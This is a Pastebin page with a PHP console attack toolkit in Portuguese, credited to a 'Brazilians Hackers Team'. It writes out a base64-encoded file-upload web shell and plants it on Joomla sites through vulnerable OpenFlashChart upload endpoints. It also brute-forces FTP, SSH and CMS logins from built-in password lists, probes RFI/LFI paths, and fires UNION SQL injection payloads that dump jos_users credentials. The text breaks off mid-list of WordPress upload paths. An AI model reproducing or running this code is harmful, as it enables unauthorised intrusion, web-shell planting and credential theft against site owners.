Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- $nan12="3";
- $saza="2$nan12";
- error_reporting(0);
- $pre1="1";
- $pr3="5";
- $namzak="4";
- $liliokjk ="$pre1$saza$namzak$pr3";
- set_time_limit(0);
- $uploadfile="upload.php";
- $uploader = base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT4qKiogQnJhemlsaWFucyBIYWNrZXJzIFRlYW0gKioqPC90aXRsZT4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBDb21wbGF0ZSAhISE8L2I+PGJyPjxicj4nOyB9DQoJZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4=");
- $fbr=@fopen("upload.php","a+");
- @fwrite($fbr,$uploader);
- @fclose($fbr);
- ////first
- $lpa="$liliokjk == $clientpass ";
- echo"
- +#############################+
- # #
- # *** Brazilians Hackers Team #
- # #
- +#############################+
- [*]Entre Com A Senha Para Iniciar[*]: ";$clientpass=trim(fgets(STDIN,1024));
- if($liliokjk == $clientpass){
- echo"
- ##
- / \
- / \
- / \
- / \
- / \
- /____________\
- | |
- |, .-. .-. ,|
- | )(_o/ \o_)( |
- |/ /\ \|
- (_ ^^ _)
- | |
- ==|==========|==>
- `----------`
- ||==========================================||
- || *** Brazilians Hackers Team *** ||
- || ||
- || *** Brazilians Hackers Team *** ||
- ||------------------------------------------||
- || ||
- || *** Brazilians Hackers Team *** ||
- || ||
- || ||
- ||==========================================||
- [1] JOOMLA SCANNER:
- [2] WORDPRESS SCANNER:
- [3] GERAL SCAN:
- [4] ADMIN FINDER:
- [5] TIPOS DE SCRIPT:
- [6] BRUTE FORCE:
- [7] SAIR DO PROGRAMA
- \n\n
- ";
- echo " Escolha Uma Opcao E Aperte Enter:\n
- ===>";
- $id =trim(fgets(STDIN,1024));
- if(!$id){
- $sec=true;
- while($sec){
- echo"Entre Com Alguma Opcao\n\n";
- echo "ID Selecionada ===>";
- $id =trim(fgets(STDIN,1024));
- if($id){
- $sec=false;
- }
- }
- }
- if($id == 7){
- echo"
- Skype: BrazilObscure
- Facebook: ChmoD.Haxor.5
- Email: BrazilObscure@live.com
- ";
- }
- if($id == 6){
- echo"
- | |__ _ __ _ _| |_ ___
- | '_ \| '__| | | | __/ _ \
- | |_) | | | |_| | || __/
- |_.__/|_| \__,_|\__\___|
- ================================
- || Brute Force Arabe Portal ||
- || ||
- || by ./ChmoD ||
- ================================
- [1] BRUTE FORCE FTP
- [2] BRUTE FORCE SSH
- [3] BRUTE FORCE ARABE PORTAL
- [4] BRUTE FORCE 4IMAGES
- [5] BRUTE FORCE TRAIDENT
- ";
- echo"\n Entre Com Uma ID ===>";
- $brutid=trim(fgets(STDIN,1024));
- ##############traidnt-br
- if($brutid == 5) {
- echo"Seu Site ============>";
- $trasite=trim(fgets(STDIN,1024));
- echo"Usuario ============>";
- $trauser = trim(fgets(STDIN,1024));
- # Passwords
- $trauspass1 = array("1234563","123654","123123","112233","123321","102030","123451","123456789","6543213",'654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321");
- function brute($site,$trauser,$trauspass12)
- {
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_URL, $site."/admin/login.php");
- curl_setopt($curl,CURLOPT_POSTFIELDS,"username={$trauser}&password={$trauspass12}");
- curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
- curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
- $brute = curl_exec($curl);
- return $brute;
- }
- foreach($trauspass1 as $trauspass12)
- {
- $b0x = brute($site,$trauser,$trauspass12);
- if(preg_match('#<a href="(.*?)">Top</a>#', $b0x))
- {
- echo "[+] Cracked \n Username : {$trauser}\n Password : {$trauspass12}\n\n";
- break;
- }
- }
- }
- ////////////////////////4images
- if($brutid == 4){
- echo"
- **********************************
- || BRUTE FORCE 4IMAGES ||
- ***********************************
- ";
- echo"Seu Site ALvo ======>";
- $images4site =trim(fgets(STDIN,1024));
- echo"Usuario =======>";
- $images4username = trim(fgets(STDIN,1024));
- $images4pass = array("1234563","123654","123123","112233","123321","102030","123451","123456789","6543213",'654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321");
- # Function Token
- function token($images4site)
- {
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_URL, $images4site);
- curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
- curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
- $start = curl_exec($curl);
- preg_match('/<input type="hidden" name="__csrf" value="(.*?)" /', $start, $token);
- return $token[1];
- }
- $hash = token($images4site);
- # Function Brute
- function brute($images4site,$images4username,$images4password,$hash)
- {
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_POST, 1);
- curl_setopt($curl, CURLOPT_URL, $images4site);
- curl_setopt($curl, CURLOPT_POSTFIELDS, "__csrf={$hash}&action=login&redirect=#&loginusername=$images4username&loginpassword=$images4password");
- curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
- curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
- $brute = curl_exec($curl);
- return $brute;
- }
- foreach($images4pass as $images4password)
- {
- $b0x = brute($images4site,$images4username,$images4password,$hash);
- if(preg_match('/<p><a href="#">(.*?)<\/a><\/p>/', $b0x))
- {
- echo "[+]Usuario Encontrado: {$images4username} \n [+]Password: {$images4password}";
- break;
- }
- }
- }
- if($brutid == 3){
- echo"
- **********************
- BRUTE FORCE ARABE PORTAL*
- **********************
- ";
- echo"Site Alvo =========>";
- $sitear = trim(fgets(STDIN,1024));
- $arsite = "$sitear/admin/";
- echo"Nome Do Usuario\n =========>";
- $usernamear =trim(fgets(STDIN,1024));
- # Passwords
- $nonopasswordsasqs = array('123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321");
- function brute($arsite,$usernamear,$nonopasswordsasq)
- {
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_URL, $arsite);
- curl_setopt($curl,CURLOPT_POSTFIELDS,"user_name={$usernamear}&user_pass={$nonopasswordsasq}");
- @curl_setopt($curl,CURLOPT_COOKIEJAR,"cookie.txt");
- @curl_setopt($curl,CURLOPT_COOKIEFILE,"cookie.txt");
- $brute = curl_exec($curl);
- if(eregi('<p align="center"><b><font size="4" color="#FFFFFF">', $brute))
- {
- echo "[+] Encontrado
- Username:{$usernamear};\n
- Password : {$nonopasswordsasq}";
- }
- return $brute;
- }
- foreach($nonopasswordsasqs as $nonopasswordsasq)
- {
- brute($arsite,$usernamear,$nonopasswordsasq);
- }
- }
- //////////////////////////////////ssh brut
- if($brutid == 2){
- echo"
- *********************************
- ================================
- || ||
- || BRUTE FORCE SSH ||
- || ||
- =================================
- Entre Com O Ip Do Servidor
- ======>"; $serverssh=trim(fgets(STDIN,1024));
- echo"Nome Do Usuario\n ====>"; $usernamessh=trim(fgets(STDIN,1024));
- $passwordss=array('ssh','passwodssh','123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321","321321",
- "pass123",
- "password123",
- "demo",
- "demo123",
- "demopass",
- "123456789","administrator","123321","123456","1234567","12345678","123456789"
- ,"123456123456"
- ,"admin2010"
- ,"admin2011"
- ,"P@ssW0rd"
- ,"!@#$%^"
- ,"!@#$%^&*("
- ,"(*&^%$#@!"
- ,"111111"
- ,"222222"
- ,"333333"
- ,"444444"
- ,"555555"
- ,"666666"
- ,"777777"
- ,"888888"
- ,"999999"
- ,"admin2012"
- ,"admin2013"
- ,"admin2014"
- ,"password2013"
- ,"password2014");
- foreach($passwordss as $passwordssh){
- $conectssh=ssh2_connect($serverssh,22);
- if($conectssh){
- $sshlogin =ssh2_auth_password($conectssh,$usernamessh,$passwordssh);
- if($sshlogin){
- echo"
- crAcked \n\n
- \n\n\n
- \n******************************************************\n
- \n*user:$usernamessh=====>passsword:$passwordssh\n\n\n *\n
- \n******************************************************\n
- ";
- }else{
- "";
- }
- }else{
- echo"Cant#connect";
- }
- }
- ////////////////////////////////////////////////////////////
- }
- if($brutid == 1){
- echo"
- **********************************
- * BRUTE FORCE FTP *
- **********************************
- IP Do Servidor ==>";
- $ip= trim(fgets(STDIN,1024));
- echo"\n";
- echo"Usuario==>";
- $usernameftp =trim(fgets(STDIN,1024));
- $passwordftp=array("gat0tKaca",'123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321","321321",
- "pass123",
- "password123",
- "demo",
- "demo123",
- "demopass",
- "123456789","administrator","123321","123456","1234567","12345678","123456789"
- ,"123456123456"
- ,"admin2010"
- ,"admin2011"
- ,"P@ssW0rd"
- ,"!@#$%^"
- ,"!@#$%^&*("
- ,"(*&^%$#@!"
- ,"111111"
- ,"222222"
- ,"333333"
- ,"444444"
- ,"555555"
- ,"666666"
- ,"777777"
- ,"888888"
- ,"999999"
- ,"admin2012"
- ,"admin2013"
- ,"admin2014"
- ,"password2013"
- ,"password2014");
- foreach($passwordftp as $passftp){
- $timeoutftp="40";
- $ftpport="21";
- $conent=ftp_connect($ip,$ftpport,$timeoutftp);
- if($conent){
- $lohin=ftp_login($conent,$usernameftp,$passftp);
- if($lohin){
- echo "Encontrado \n\n
- \n\n\n
- \n******************************************************\n
- \n*user:$usernameftp===>password:$passftp\n\n
- \n****************************************************\n";
- }else{
- echo "";
- }
- }else{
- echo"CanT connect ";
- }
- }
- }
- }
- if($id == 1){
- echo"
- ||=============================================||
- || ,--^----------,--------,-----,-------^--, ||
- || | ||||||||| `--------' | O ||
- || `+---------------------------^----------| ||
- || `\_,-------, _________________________| ||
- || / XXXXXX /`| / ||
- || / XXXXXX / `\ / ||
- || / XXXXXX /\______( ||
- || / XXXXXX / ||
- || / XXXXXX / ||
- ||(________( ||
- || `------' ||
- ||=============================================||
- JOOMLA Selecione Alguma ID:
- [1]SCANNER UPLOAD SHELL:
- [2]SCANNER SQL INJECTION :
- [3]SCANNER JCE :
- [4]BRUTE FORCE :
- [5]SCANNER LFI/RFI:
- [6]COMPOSENT FINAL:\n
- ";
- echo"ID Selecionada ==>";
- $joomlaid=trim(fgets(STDIN,1024));
- }
- if($joomlaid == 6){
- echo"
- +#############################+
- # #
- # COMPOSENT JOOMLA #
- # #
- +#############################+
- Site Alvo
- =====>";$urlcom=trim(fgets(STDIN,1024));
- $source = @file_get_contents($urlcom);
- preg_match_all('{option,(.*?)/}i',$source,$f);
- preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2);
- preg_match_all('{/component/(.*?)/?view=reset}i',$source,$f3);
- preg_match_all('{/components/(.*?)/}i',$source,$f3);
- $arz=array_merge($f2[1],$f[1],$f3[1]);
- $coms=array();
- foreach(array_unique($arz) as $x){
- $coms[]=$x;}
- foreach($coms as $comm){
- echo "
- ************************\n
- COMPOSENT : $comm\n
- ************************\n
- ";
- }
- }
- if($joomlaid == 5){
- echo"
- *********************************
- *** Scanner Joomla RFI/LFI ***
- *********************************\n\n
- Site Alvo http://\n
- Seu Site ======> "; $rfijm =trim(fgets(STDIN,1024));
- $rfijoomlap=array("/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=#rfi",
- "/components/com_simpleboard/file_upload.php?sbp=#rfi",
- "/components/com_hashcash/server.php?mosConfig_absolute_path=#rfi",
- "/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=#rfi",
- "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=#rfi",
- "/components/com_performs/performs.php?mosConfig_absolute_path=#rfi",
- "/components/com_forum/download.php?phpbb_root_path=#rfi",
- "/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=#rfi",
- "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=#rfi",
- "/components/minibb/index.php?absolute_path=#rfi",
- "/components/com_smf/smf.php?mosConfig_absolute_path=#rfi",
- "/modules/mod_calendar.php?absolute_path=#rfi",
- "/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=#rfi",
- "/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=#rfi",
- "/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=#rfi",
- "/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=#rfi",
- "/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=#rfi",
- "/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=#rfi",
- "/components/com_securityimages/configinsert.php?mosConfig_absolute_path=#rfi",
- "/components/com_securityimages/lang.php?mosConfig_absolute_path=#rfi",
- "/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=#rfi",
- "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=#rfi",
- "/akocomments.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=#rfi",
- "/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=#rfi",
- "/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=#rfi",
- "/components/com_zoom/includes/database.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=#rfi",
- "/components/com_fm/fm.install.php?lm_absolute_path=#rfi",
- "/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=#rfi",
- "/components/com_lmo/lmo.php?mosConfig_absolute_path=#rfi",
- "/components/com_lmo/lmo.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=#rfi",
- "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_webring/admin.webring.docs.php?component_dir=#rfi",
- "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=#rfi",
- "/components/com_mambowiki/MamboLogin.php?IP=#rfi",
- "/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=#rfi",
- "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=#rfi",
- "/components/com_cpg/cpg.php?mosConfig_absolute_path=#rfi",
- "/components/com_moodle/moodle.php?mosConfig_absolute_path=#rfi",
- "/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=#rfi",
- "/components/com_mospray/scripts/admin.php?basedir=#rfi",
- "/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=#rfi",
- "/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=#rfi",
- "/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=#rfi",
- "/components/com_madeira/img.php?url=#rfi",
- "/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=#rfi",
- "/components/com_bsq_sitestats/external/rssfeed.php?baseDir=#rfi",
- "/com_bsq_sitestats/external/rssfeed.php?baseDir=#rfi");
- foreach($rfijoomlap as $rfisec){
- $yesrfi="$rfijm/$rfisec";
- $anis=get_headers($yesrfi);
- $lirif=preg_match("/404/",$anis[0]);
- if(!$lirif){
- echo"
- ===============================\n
- | Encontrado !!!!!\n |
- ===============================\n
- $yesrfi\n
- ";
- }
- }
- }
- if($joomlaid == 1){
- echo " RCE & RCI WEB \n http:// ==>";
- $rce =trim(fgets(STDIN,1024));
- $site = $rce;
- $filename = "upload.php";
- $path = array('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php');
- $name = array("/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/","/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/","/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/","/administrator/components/com_jinc/classes/graphics/tmp-upload-images/","/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/","/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/");
- $uploader = base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT4qKiogQnJhemlsaWFucyBIYWNrZXJzIFRlYW0gKioqPC90aXRsZT4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBDb21wbGF0ZSAhISE8L2I+PGJyPjxicj4nOyB9DQoJZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4=");
- $options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
- $context = stream_context_create($options);
- foreach($rce as $sites)
- {
- foreach($path as $upload)
- {
- $fopen = @fopen("{$sites}{$upload}?name={$filename}", 'r', false, $context);
- }
- foreach($name as $names)
- {
- $url = "{$sites}{$names}{$filename}";
- $check = @file_get_contents($url);
- if(eregi("brazilobscure@live.com", $check))
- {
- echo " {$sites}/{$names}/{$filename} \n />";
- flush();
- }else{
- echo "\n Nao Exploitado\n";
- }
- }
- }
- $headers = array("Content-Type: application/octet-stream");
- $uploadfile="upload.php";
- $sec4ever =curl_init("$rce/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=upload.php");
- curl_setopt($sec4ever, CURLOPT_POST, true);
- curl_setopt($sec4ever, CURLOPT_POSTFIELDS, @$uploadfile);
- curl_setopt($sec4ever, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($sec4ever, CURLOPT_HTTPHEADER, $headers);
- $postResult = curl_exec($sec4ever);
- curl_close($sec4ever);
- $uaya="$rce/administrator/components/com_maian15/charts/tmp-upload-images/upload.php?cmd=id";
- $na=file_get_contents($uaya);
- if($na){
- echo"Exploitado\n $uaya";
- }
- }
- if($joomlaid == 2)
- {
- echo "Site Alvo http://\n===>";
- $jsql=trim(fgets(STDIN,1024));
- $com_rsfiles="$jsql//index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,concat(0x47726f75705833,username,0x7c3a7c,password,0x47726f75705833)+from+jos_users--";
- $get_com=@file_get_contents($com_rsfiles);
- if($get_com) {
- preg_match("#Brazilians Hackers Team#",$get_com,$com_ress);
- $all = explode('|:|',$com_ress[1]);
- $username = $all[0];
- $password = $all[1];
- echo "
- DOne
- username:$username\n
- password:$password \n
- ";
- }
- $Alameda ="$jsql/index.php?option=com_alameda&controller=comments&task=edit&storeid=1";
- $na =@file_get_contents($alameda);
- if($na)
- {
- echo"\n \n $jsql/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(username,0x3a,password)+from+jos_users--";
- }
- $rokdownloads="$jsql/index.php?option=com_alfurqan15x&action=viewayat&surano=1";
- $nananna=@file_get_contents($rokdownloads);
- if($nananna){
- echo"\n $jsql/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
- }
- //////////com_timereturns ""
- $timereturns ="$jsql/index.php?option=com_timereturns&view=timereturns&id=7";
- $jais=file_get_contents($timereturns);
- if($jais){
- echo"\n $jsql/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--";
- }
- ////com_ezrealty
- $sa ="$jsql/index.php?option=com_ezrealty&task=viewcategory&id=1";
- $iua= file_get_contents($sa);
- if($iua){
- echo"$sa";
- }
- //////com_jobprofile
- $saaaa ="$jsql/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1";
- $ra895=file_get_contents($saaaa);
- if($ra895){
- echo"$jsql/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--";
- }else{echo"\n not found";}
- /////////////////////////////
- }
- ///////////////////////jce scaner
- if($joomlaid == 3 ){
- echo "Site Alvo http://\n";
- echo"Seu Site\n =====>";
- $jcesite =trim(fgets(STDIN,1024));
- echo"\n";
- echo"\n";
- $jcepath = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743';
- $alljce ="$jcesite$jcepath";
- $jceget = @file_get_contents($alljce);
- $jcechek=eregi('{"result":null,"error":"No function call specified!"}',$jceget);
- if($jcechek){
- echo "\n Vulneravel JCE";
- }
- else {
- echo "\n Nao Vulneravel";
- }
- }
- if($joomlaid == 4){
- echo "Brute Force Joomla\n";
- echo"Seu Site\n =====>";
- $rujm =trim(fgets(STDIN,1024));
- echo"\n";
- echo"username ===>";
- $usjm =trim(fgets(STDIN,1024));
- echo"\n";
- $sitejmi ="$rujm/administrator/index.php";
- $passwords =array('123456','123654','123123','112233','123321','102030','123451','123456789','654321','654123','123qwe','qwerty','azerty','123450','123412','121314','132132','132123','123132','123012',"123","1234","12345","123456","1234567","12345678","123456789","1234567890","root","toor","password","admin","admin123","ftppassword","ftppass","passwod123","nobadypass","userpass","123123","321321","456321","321321",
- "pass123",
- "password123",
- "demo",
- "demo123",
- "demopass",
- "123456789","administrator","123321","123456","1234567","12345678","123456789"
- ,"123456123456"
- ,"admin2010"
- ,"admin2011"
- ,"P@ssW0rd"
- ,"!@#$%^"
- ,"!@#$%^&*("
- ,"(*&^%$#@!"
- ,"111111"
- ,"222222"
- ,"333333"
- ,"444444"
- ,"555555"
- ,"666666"
- ,"777777"
- ,"888888"
- ,"999999"
- ,"admin2012"
- ,"admin2013"
- ,"admin2014"
- ,"password2013"
- ,"password2014");
- function token($sitejmi)
- {
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_URL,$sitejmi);
- @curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
- @curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
- $get = curl_exec($curl);
- preg_match('/<input type="hidden" name="(.*?)" value="1"/', $get, $token);
- return $token[1];
- }
- $hash = token($sitejmi);
- function brute($sitejmi,$usjm,$password,$hash)
- {
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_URL, $sitejmi);
- curl_setopt($curl,CURLOPT_POSTFIELDS,"username={$usjm}&passwd={$password}&lang=&option=com_login&task=login&return=aW5kZXgucGhw&{$hash}=1");
- @curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
- @curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
- $brute = curl_exec($curl);
- if(eregi("Logout" , $brute))
- {
- echo " HI tut I found some password for you lol : \n
- **************************
- * username:{$usjm}\n
- * Password : {$password}\n
- ***************************
- ";
- }
- return $brute;
- }
- foreach($passwords as $password)
- {
- brute($sitejmi,$usjm,$password,$hash);
- }
- @system("del cookie.txt");
- @system("rm cookie.txt");
- }
- if($id == 2){
- echo"
- __ ___ __ ___ ____ ____ __
- \ \ /\ / / '_ \ / __| / ___| /\ | __ \
- \ V V /| |_) | \__ \ ||___ /__\ | | | |
- \_/\_/ | .__/ |___/ \____|/----\|_| |_|
- [1] SCANNER UPLOAD SHELL MULTIP BUGS :
- [2] SCANNER SQL INJECTIO USANDO MULTIP BUGS:
- [3] SCANNER PATH DISCLOSURE USANDO MULTIP ERROR:
- [4] SCANNER PLUGINS :
- ";
- echo"\n\n Selecione A Opcao == >";
- $wpid = trim(fgets(STDIN,1024));
- echo"\n";
- }
- if($wpid == 4){
- echo"
- **============================**
- ||============================||
- || WORDPRESS PLUGINS ||
- **============================**
- Site Alvo:
- ========>";$nanwp =trim(fgets(STDIN,1024));
- $sourcewp = @file_get_contents($nanwp);
- preg_match_all("#/plugins/(.*?)/#i", $source, $f19);
- $plugins=array_unique($f19[1]);
- if(count($plugins)==0){ echo "not found";}
- foreach($plugins as $plugin){
- echo "
- ************************
- Plugin : $plugin\n
- ************************
- ";
- }
- }
- if($wpid == 1) {
- echo"Entre Com Seu Site http://\n";
- echo"=====>";
- $id1wp =trim(fgets(STDIN,1024));
- echo"Escaneando Para Upload Da Shell ......\n";
- $wppath=array(
- "/wp-content/plugins/lazy-seo/lazyseo.php",
- "/wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php",
- "/wp-content/plugins/wpmarketplace/uploadify/uploadify.php",
- "/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
- "/wp-content/plugins/kish-guest-posting/uploadify/scripts/uploadify.php",
- "/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php",
- "/wp-content/plugins/pica-photo-gallery/picaPhotosResize.php",
- "/wp-content/plugins/mac-dock-gallery/upload-file.php",
- "/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php",
- "/wp-content/plugins/custom-content-type-manager/upload_form.php",
- "/wp-content/plugins/front-file-manager/upload.php",
- "/wp-content/plugins/rbxgallery/uploader.php",
- "/wp-content/plugins/wpstorecart/php/upload.php",
- "/wp-content/plugins/omni-secure-files/plupload/examples/upload.php",
- "/wp-content/plugins/front-end-upload/upload.php",
- "/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php",
- "/wp-content/plugins/font-uploader/font-upload.php",
- "/wp-content/plugins/foxypress/uploadify/uploadify.php",
- "/wp-content/plugins/html5avmanager/lib/uploadify/custom.php",
- "/wp-content/plugins/asset-manager/upload.php",
